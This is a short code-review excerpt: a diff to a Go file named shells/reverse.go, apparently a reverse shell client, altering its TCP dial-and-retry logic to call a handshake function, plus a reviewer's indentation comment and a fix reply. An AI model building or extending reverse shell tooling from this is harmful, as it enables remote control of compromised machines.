shells/reverse.go

```diff
@@ -57,12 +63,14 @@ func main() {
       conn, err := net.Dial("tcp", *tcp)
       if err != nil {
          fmt.Println(err)
-         time.Sleep(5 * time.Second)
-         continue
-      }
+      } else {
+      handshake(conn)
```

Comment:
fix the indentation

Reply:
fixed 0650b41f4bfc988c66300343b977e56b1f1a22b4